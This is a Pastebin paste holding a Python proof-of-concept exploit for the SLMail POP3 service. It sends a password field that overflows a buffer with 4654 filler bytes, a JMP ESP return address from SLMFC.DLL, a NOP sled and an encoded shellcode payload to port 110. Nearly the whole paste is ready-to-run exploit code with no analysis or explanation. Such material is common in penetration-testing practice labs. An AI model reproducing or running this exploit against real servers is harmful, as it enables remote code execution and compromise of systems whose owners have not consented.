Guest User

SLMail Final POC - Crazy Danish Hacker

a guest
Dec 28th, 2019
149
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import socket
  2.  
  3. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  4.  
  5. # \xff\xe4
  6. # Message=  0x5f4a358f : "\xff\xe4" |  {PAGE_READONLY} [SLMFC.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v6.00.8063.0 (C:\Windows\system32\SLMFC.DLL)
  7. # \x00 \x0a \x0d
  8. buf =  b""
  9. buf += b"\xdb\xd0\xbd\x7a\xaf\xcf\xbc\xd9\x74\x24\xf4\x58\x31"
  10. buf += b"\xc9\xb1\x56\x31\x68\x18\x03\x68\x18\x83\xe8\x86\x4d"
  11. buf += b"\x3a\x40\x9e\x10\xc5\xb9\x5e\x75\x4f\x5c\x6f\xb5\x2b"
  12. buf += b"\x14\xdf\x05\x3f\x78\xd3\xee\x6d\x69\x60\x82\xb9\x9e"
  13. buf += b"\xc1\x29\x9c\x91\xd2\x02\xdc\xb0\x50\x59\x31\x13\x69"
  14. buf += b"\x92\x44\x52\xae\xcf\xa5\x06\x67\x9b\x18\xb7\x0c\xd1"
  15. buf += b"\xa0\x3c\x5e\xf7\xa0\xa1\x16\xf6\x81\x77\x2d\xa1\x01"
  16. buf += b"\x79\xe2\xd9\x0b\x61\xe7\xe4\xc2\x1a\xd3\x93\xd4\xca"
  17. buf += b"\x2a\x5b\x7a\x33\x83\xae\x82\x73\x23\x51\xf1\x8d\x50"
  18. buf += b"\xec\x02\x4a\x2b\x2a\x86\x49\x8b\xb9\x30\xb6\x2a\x6d"
  19. buf += b"\xa6\x3d\x20\xda\xac\x1a\x24\xdd\x61\x11\x50\x56\x84"
  20. buf += b"\xf6\xd1\x2c\xa3\xd2\xba\xf7\xca\x43\x66\x59\xf2\x94"
  21. buf += b"\xc9\x06\x56\xde\xe7\x53\xeb\xbd\x6f\x97\xc6\x3d\x6f"
  22. buf += b"\xbf\x51\x4d\x5d\x60\xca\xd9\xed\xe9\xd4\x1e\x64\xfd"
  23. buf += b"\xe6\xf1\xce\x6e\x19\xf2\x2e\xa6\xde\xa6\x7e\xd0\xf7"
  24. buf += b"\xc6\x15\x20\xf7\x12\x83\x2a\x6f\x5d\xfb\xab\xe5\x35"
  25. buf += b"\xf9\xab\xe9\x24\x74\x4d\x59\xf7\xd6\xc2\x1a\xa7\x96"
  26. buf += b"\xb2\xf2\xad\x19\xec\xe3\xcd\xf0\x85\x8e\x21\xac\xfe"
  27. buf += b"\x26\xdb\xf5\x75\xd6\x24\x20\xf0\xd8\xaf\xc0\x04\x96"
  28. buf += b"\x47\xa1\x16\xcf\x3f\x49\xe7\x10\xaa\x49\x8d\x14\x7c"
  29. buf += b"\x1e\x39\x17\x59\x68\xe6\xe8\x8c\xeb\xe1\x17\x51\xdd"
  30. buf += b"\x9a\x2e\xc7\x61\xf5\x4e\x07\x61\x05\x19\x4d\x61\x6d"
  31. buf += b"\xfd\x35\x32\x88\x02\xe0\x27\x01\x97\x0b\x11\xf5\x30"
  32. buf += b"\x64\x9f\x20\x76\x2b\x60\x07\x04\x2c\x9e\xd5\x23\x95"
  33. buf += b"\xf6\x25\x74\x25\x06\x4c\x74\x75\x6e\x9b\x5b\x7a\x5e"
  34. buf += b"\x64\x76\xd3\xf6\xef\x17\x91\x67\xef\x3d\x77\x39\xf0"
  35. buf += b"\xb2\xac\xca\x8b\xbb\x53\x2b\x6c\xd2\x37\x2c\x6c\xda"
  36. buf += b"\x49\x11\xba\xe3\x3f\x54\x7e\x50\x4f\xe3\x23\xf1\xda"
  37. buf += b"\x0b\x77\x01\xcf"
  38.  
  39. shellcode = buf
  40.  
  41.  
  42. nop = "\x90" * 16 # NOP
  43. eip = "\x8f\x35\x4a\x5f" # 5f 4a 35 8f
  44. buffer = '\x41' * 4654 + eip + nop + shellcode
  45.  
  46. s.connect(('127.0.0.1', 110))
  47. data = s.recv(1024)
  48. print data
  49.  
  50. s.send('USER username' +'\r\n')
  51. data = s.recv(1024)
  52. print data
  53.  
  54. s.send('PASS ' + buffer + '\r\n')
  55. data = s.recv(1024)
  56. print data
  57.  
  58. s.close()
RAW Paste Data Copied